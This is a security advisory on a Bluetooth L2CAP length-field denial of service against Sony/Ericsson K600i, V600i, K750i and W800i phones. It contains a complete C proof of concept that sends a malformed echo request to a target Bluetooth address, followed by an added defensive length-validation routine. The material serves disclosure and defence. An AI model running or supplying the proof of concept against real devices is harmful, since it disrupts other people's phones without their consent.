Sony/Ericsson L2CAP Length Field DoS

Author: Pierre Betouin (pierre.betouin@infratech.fr)

Certain models of Sony/Ericsson phones are vulnerable to a DoS attack involving L2CAP frames with invalid header lengths. Phone models known to be affected are:

- Sony/Ericsson K600i
- Sony/Ericsson V600i
- Sony/Ericsson K750i
- Sony/Ericsson W800i

By sending a malformed L2CAP frame to certain models of Sony/Ericsson phones it is possible to cause the device to lock up. This is done by creating an L2CAP frame with an improperly set length field. For instance, it is possible to send an L2CAP echo request frame to the device which is 4 bytes long but whose length field is set to 1 byte. When an affected device receives the frame its screen will either go blank or the device will halt.

A short raw L2CAP packet such as:

08 01 01 00

represents the following L2CAP header fields:

code   L2CAP_ECHO_REQ
ident  1
length 1

The "real" packet sent is, in fact, 4 bytes long. The DoS can be triggered when the length sent in the L2CAP field is equal to the real length minus 3 (which is the size of the L2CAP header here).

In addition, other Sony/Ericsson models may be affected.

Currently a fix for this issue is unavailable. To protect yourself from this issue, disable the affected device's Bluetooth functionality.

/* Sony/Ericsson reset display - PoC                         */
/* Pierre BETOUIN - pierre.betouin@infratech.fr              */
/* 05-02-2006                                                */
/* Vulnerability found using BSS fuzzer :                    */
/* Download www.secuobs.com/news/05022006-bluetooth10.shml   */
/*                                                           */
/* Causes abnormal behaviour on some Sony/Ericsson           */
/* cell phones                                               */
/* Vulnerable tested devices :                               */
/*   - K600i                                                 */
/*   - V600i                                                 */
/*   - K750i                                                 */
/*   - W800i                                                 */
/*   - And maybe other ones...                               */
/*                                                           */
/* Vulnerable devices will slowly turn their screen into     */
/* black and then display a white screen.                    */
/* After a short period (~45sec), they will go back to       */
/* their normal behaviour                                    */
/*                                                           */
/* gcc -lbluetooth reset_display_sonyericsson.c              */
/*     -o reset_display_sonyericsson                         */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX            */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>

#define SIZE      4
#define FAKE_SIZE 1  // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
    char *buffer;
    l2cap_cmd_hdr *cmd;
    struct sockaddr_l2 addr;
    int sock, sent, i;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <bdaddr>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Raw L2CAP socket: we hand-build the signalling frame ourselves */
    if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&addr, 0, sizeof(addr));
    addr.l2_family = AF_BLUETOOTH;

    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
        perror("bind");
        exit(EXIT_FAILURE);
    }

    /* Target device address given on the command line */
    str2ba(argv[1], &addr.l2_bdaddr);

    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
        perror("connect");
        exit(EXIT_FAILURE);
    }

    if (!(buffer = (char *) malloc((int) SIZE + 1))) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }

    /* Echo request whose length field does not match the real frame size */
    memset(buffer, 90, SIZE);
    cmd = (l2cap_cmd_hdr *) buffer;
    cmd->code  = L2CAP_ECHO_REQ;
    cmd->ident = 1;
    cmd->len   = FAKE_SIZE;

    if ((sent = send(sock, buffer, SIZE, 0)) >= 0) {
        printf("L2CAP packet sent (%d)\n", sent);
    }

    printf("Buffer:\t");
    for (i = 0; i < SIZE; i++)
        printf("%.2X ", (unsigned char) buffer[i]);
    printf("\n");

    free(buffer);
    close(sock);
    return EXIT_SUCCESS;
}
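The receiver-side check that the affected stacks apparently lack, as an added example that is not part of the original advisory or its PoC: it parses the L2CAP signalling command header (code, ident, 16-bit little-endian length, so the header occupies 4 bytes on the wire) and rejects any frame whose declared length disagrees with the bytes actually delivered, which is exactly what catches the 08 01 01 00 packet above (declared length 1, zero payload bytes present). The function and type names and the sample frames are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* L2CAP signalling command header: code (1), ident (1), len (2, little endian). */
#define L2CAP_CMD_HDR_LEN 4

enum l2cap_cmd_verdict {
    CMD_OK = 0,
    CMD_TOO_SHORT,      /* frame cannot even hold a header */
    CMD_LEN_MISMATCH    /* declared len != bytes following the header */
};

struct l2cap_cmd {
    uint8_t  code;
    uint8_t  ident;
    uint16_t len;
};

/* Parse one signalling command out of a raw frame and validate its length
 * field against the frame size before anything looks at the payload. */
enum l2cap_cmd_verdict l2cap_cmd_check(const uint8_t *frame, size_t frame_len,
                                       struct l2cap_cmd *out)
{
    if (frame_len < L2CAP_CMD_HDR_LEN)
        return CMD_TOO_SHORT;

    out->code  = frame[0];
    out->ident = frame[1];
    out->len   = (uint16_t)(frame[2] | (frame[3] << 8));

    /* The only trustworthy length is the one the transport delivered. */
    if ((size_t)out->len != frame_len - L2CAP_CMD_HDR_LEN)
        return CMD_LEN_MISMATCH;

    return CMD_OK;
}

/* Constructed sample frames: the advisory's malformed echo request, and a
 * well-formed echo request carrying two payload bytes. */
static const uint8_t malformed_echo[] = { 0x08, 0x01, 0x01, 0x00 };
static const uint8_t valid_echo[]     = { 0x08, 0x01, 0x02, 0x00, 0x5a, 0x5a };

int main(void)
{
    struct l2cap_cmd cmd;
    int v = l2cap_cmd_check(malformed_echo, sizeof malformed_echo, &cmd);
    printf("08 01 01 00: verdict %d, declared len %u, actual payload %zu\n",
           v, cmd.len, sizeof malformed_echo - L2CAP_CMD_HDR_LEN);
    return 0;
}
```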